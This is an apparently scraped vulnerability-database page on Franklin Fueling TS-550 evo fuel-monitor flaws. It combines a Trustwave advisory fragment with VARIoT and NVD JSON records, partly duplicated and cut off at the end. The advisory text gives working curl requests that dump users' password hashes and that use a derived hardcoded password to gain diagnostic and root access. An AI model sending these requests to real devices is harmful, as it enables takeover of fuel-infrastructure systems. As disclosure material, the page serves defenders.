The three primary users on the TS550 are roleGuest, roleUser, and roleAdmin. Another user exists with additional access named roleDiag. This user can access extra portions of the application such as the command line interface, enable and disable SSH, as well as run SQL commands all from the web interface. The CLI interface includes the ability to run engineering and manufacturing commands. The password for roleDiag is the key (a value returned with every POST request to tsaws.cgi) DES encrypted. This can be done in Ruby:
$ irb 1.9.3p374 :001 > "11111111".crypt("aa") => "aaDTlAa1fGGC."
Request
curl -H "Content-Type:text/xml" --data '' http://:10001/cgi-bin/tsaws.cgi
Response (note the ROLE)
The password can then be used to run various roleDiag commands. An attacker can enable SSH, and since root's password is the same as roleAdmin, they can completely compromise the device. However, Trustwave SpiderLabs have not verified this fix.
Revision History: 04/16/13 - Vulnerability disclosed to vendor 12/18/13 - Fix released on a limited basis by vendor 01/03/14 - Advisory published
References 1. http://www.franklinfueling.com/evo/
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201401-0296",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.6,
"vendor": "franklinfueling",
"version": "2.3.1.7492"
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.6,
"vendor": "franklinfueling",
"version": "2.0.0.6833"
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.0,
"vendor": "franklinfueling",
"version": null
},
{
"model": "ts-550 evo",
"scope": null,
"trust": 0.8,
"vendor": "franklin fueling",
"version": null
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 0.8,
"vendor": "franklin fueling",
"version": "2.0.0.6833"
},
{
"model": "ts-550 evo",
"scope": "lt",
"trust": 0.8,
"vendor": "franklin fueling",
"version": "2.4.0"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005929"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-538"
},
{
"db": "NVD",
"id": "CVE-2013-7248"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:franklinfueling:ts-550_evo",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:franklinfueling:ts-550_evo_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005929"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nate Drier and Matt Jakubowski of TrustWave SpiderLabs",
"sources": [
{
"db": "BID",
"id": "65041"
}
],
"trust": 0.3
},
"cve": "CVE-2013-7248",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2013-7248",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-67250",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-7248",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2013-7248",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201401-538",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-67250",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67250"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005929"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-538"
},
{
"db": "NVD",
"id": "CVE-2013-7248"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST. Franklin Fueling Systems TS-550 evo is prone to a security-bypass vulnerability. \nAttackers can exploit this issue to bypass the authentication mechanism and gain access to the vulnerable device. \nFranklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A remote attacker can use this to gain root privileges and take full control of the device. Affects prior to version\n2.4.0\n\nProduct description:\nA fuel management system with a programmable interface used for inventory\nand delivery management. \n\nFinding 1: Insufficient Access Control\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7247\nCWE: CWE-200\n\nAs the Guest user (the lowest privilege), a user can post the\ncmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the\nusernames and password hashes (in DES format) for all users of the\napplication. Once dumped, they can be cracked and used to access\nauthenticated portions of the application. \n\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebGetConfiguration\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-02-19T22:09:22Z\" TIME_STAMP_LOCAL=\"2013-02-19T17:09:22\" KEY=\"11111111\" ROLE=\"roleGuest\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebGetConfiguration\"\u003e\u003cCONFIGURATION\u003e\n \u003cDEBUGGING LOGGING_ENABLED=\"false\" LOGGING_PATH=\"/tmp\"/\u003e\n \u003cROLE_LIST\u003e\n \u003cROLE NAME=\"roleAdmin\" PASSWORD=\"YrKMc2T2BuGvQ\"/\u003e\n \u003cROLE NAME=\"roleUser\" PASSWORD=\"2wd2DlEKUPTr2\"/\u003e\n \u003cROLE NAME=\"roleGuest\" PASSWORD=\"YXFCsq2GXFQV2\"/\u003e\n \u003c/ROLE_LIST\u003e\n\u003c/CONFIGURATION\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nFinding 2: Hardcoded Technician Credentials\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7248\nCWE: CWE-798\n\nThe three primary users on the TS550 are roleGuest, roleUser, and\nroleAdmin. Another user exists with additional access named roleDiag. This\nuser can access extra portions of the application such as the command line\ninterface, enable and disable SSH, as well as run SQL commands all from the\nweb interface. The CLI interface includes the ability to run engineering\nand manufacturing commands. The password for roleDiag is the key (a value\nreturned with every POST request to tsaws.cgi) DES encrypted. This can be\ndone in Ruby:\n\n\n$ irb\n1.9.3p374 :001 \u003e \"11111111\".crypt(\"aa\")\n =\u003e \"aaDTlAa1fGGC.\"\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST PASSWORD=\"aaDTlAa1fGGC.\"\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebCheckRole\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response (note the ROLE)\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-03-04T16:53:01Z\" TIME_STAMP_LOCAL=\"2013-03-04T11:53:01\" KEY=\"11111111\" ROLE=\"roleDiag\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebCheckRole\"\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nThe password can then be used to run various roleDiag commands. An attacker\ncan enable SSH, and since root\u0027s password is the same as roleAdmin, they\ncan completely compromise the device. However, Trustwave SpiderLabs have not verified this fix. \n\n\nRevision History:\n04/16/13 - Vulnerability disclosed to vendor\n12/18/13 - Fix released on a limited basis by vendor\n01/03/14 - Advisory published\n\nReferences\n1. http://www.franklinfueling.com/evo/\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave\u0027s SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\n________________________________\n\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7248"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005929"
},
{
"db": "BID",
"id": "65041"
},
{
"db": "VULHUB",
"id": "VHN-67250"
},
{
"db": "PACKETSTORM",
"id": "124873"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-67250",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67250"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7248",
"trust": 2.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005929",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201401-538",
"trust": 0.7
},
{
"db": "BID",
"id": "65041",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "124873",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "31180",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-67250",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67250"
},
{
"db": "BID",
"id": "65041"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005929"
},
{
"db": "PACKETSTORM",
"id": "124873"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-538"
},
{
"db": "NVD",
"id": "CVE-2013-7248"
}
]
},
"id": "VAR-201401-0296",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-67250"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-11T22:53:07.912000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "TS-550 evo",
"trust": 0.8,
"url": "http://www.franklinfueling.com/americas/en/ts-550-evo"
},
{
"title": "ts550evo-2327608",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=47720"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005929"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-538"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67250"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005929"
},
{
"db": "NVD",
"id": "CVE-2013-7248"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://www.trustwave.com/spiderlabs/advisories/twsl2014-001.txt"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7248"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7248"
},
{
"trust": 0.3,
"url": "http://www.franklinfueling.com/americas/en"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7247"
},
{
"trust": 0.1,
"url": "http://www.franklinfueling.com/evo/"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "http://www.franklinfueling.com/)"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7248"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67250"
},
{
"db": "BID",
"id": "65041"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005929"
},
{
"db": "PACKETSTORM",
"id": "124873"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-538"
},
{
"db": "NVD",
"id": "CVE-2013-7248"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-67250"
},
{
"db": "BID",
"id": "65041"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005929"
},
{
"db": "PACKETSTORM",
"id": "124873"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-538"
},
{
"db": "NVD",
"id": "CVE-2013-7248"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-26T00:00:00",
"db": "VULHUB",
"id": "VHN-67250"
},
{
"date": "2014-01-03T00:00:00",
"db": "BID",
"id": "65041"
},
{
"date": "2014-01-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005929"
},
{
"date": "2014-01-21T23:03:33",
"db": "PACKETSTORM",
"id": "124873"
},
{
"date": "2014-01-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-538"
},
{
"date": "2014-01-26T01:55:09.890000",
"db": "NVD",
"id": "CVE-2013-7248"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-27T00:00:00",
"db": "VULHUB",
"id": "VHN-67250"
},
{
"date": "2015-03-19T08:34:00",
"db": "BID",
"id": "65041"
},
{
"date": "2014-01-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005929"
},
{
"date": "2014-01-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-538"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-7248"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-538"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Franklin Fueling Systems TS-550 evo In the firmware root Privileged vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005929"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-538"
}
],
"trust": 0.6
}
}
CVE-2022-44039 (GCVE-0-2022-44039)
Vulnerability from nvd – Published: 2022-12-05 00:00 – Updated: 2025-04-24 13:55
VLAI
Summary
Franklin Fueling System FFS Colibri 1.9.22.8925 is affected by: File system overwrite. The impact is: File system rewrite (remote). ¶¶ An attacker can overwrite system files like [system.conf] and [passwd], this occurs because the insecure usage of "fopen" system function with the mode "wb" which allows overwriting file if exists. Overwriting files such as passwd, allows an attacker to escalate his privileges by planting backdoor user with root privilege or change root password.
Severity
9.8 (Critical)
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- n/a
- CWE-863 - Incorrect Authorization
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://pastebin.com/raw/64stbsWu |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T13:47:05.502Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://pastebin.com/raw/64stbsWu"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-44039",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-24T13:54:59.273366Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-863",
"description": "CWE-863 Incorrect Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-24T13:55:15.058Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Franklin Fueling System FFS Colibri 1.9.22.8925 is affected by: File system overwrite. The impact is: File system rewrite (remote). \u00b6\u00b6 An attacker can overwrite system files like [system.conf] and [passwd], this occurs because the insecure usage of \"fopen\" system function with the mode \"wb\" which allows overwriting file if exists. Overwriting files such as passwd, allows an attacker to escalate his privileges by planting backdoor user with root privilege or change root password."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-12-05T00:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://pastebin.com/raw/64stbsWu"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-44039",
"datePublished": "2022-12-05T00:00:00.000Z",
"dateReserved": "2022-10-30T00:00:00.000Z",
"dateUpdated": "2025-04-24T13:55:15.058Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-7248 (GCVE-0-2013-7248)
Vulnerability from nvd – Published: 2014-01-26 01:00 – Updated: 2024-08-06 18:01
VLAI
Summary
Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.trustwave.com/spiderlabs/advisories/T… | x_refsource_MISC |
Date Public
2014-01-03 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T18:01:19.723Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-01-03T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2014-01-26T00:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7248",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt",
"refsource": "MISC",
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7248",
"datePublished": "2014-01-26T01:00:00.000Z",
"dateReserved": "2013-12-31T00:00:00.000Z",
"dateUpdated": "2024-08-06T18:01:19.723Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-7247 (GCVE-0-2013-7247)
Vulnerability from nvd – Published: 2014-01-26 01:00 – Updated: 2024-08-06 18:01
VLAI
Summary
cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.trustwave.com/spiderlabs/advisories/T… | x_refsource_MISC |
Date Public
2014-01-03 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T18:01:19.818Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
